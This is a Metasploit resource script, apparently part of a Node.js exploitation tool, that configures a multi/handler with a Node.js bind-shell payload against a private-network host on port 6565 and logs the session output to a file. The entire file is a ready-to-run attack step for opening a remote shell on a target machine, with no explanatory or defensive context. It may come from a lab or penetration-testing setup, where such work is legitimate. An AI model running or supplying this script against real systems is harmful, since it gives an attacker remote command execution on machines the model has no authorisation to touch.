use exploit/multi/handler
set payload nodejs/shell_bind_tcp
set rhost 192.168.74.148
set lport 6565
set ExitOnSession true 
spool /home/kali/PycharmProjects/nodexp/scripts/nodejs_shell.rc.output.txt
exploit -j -z

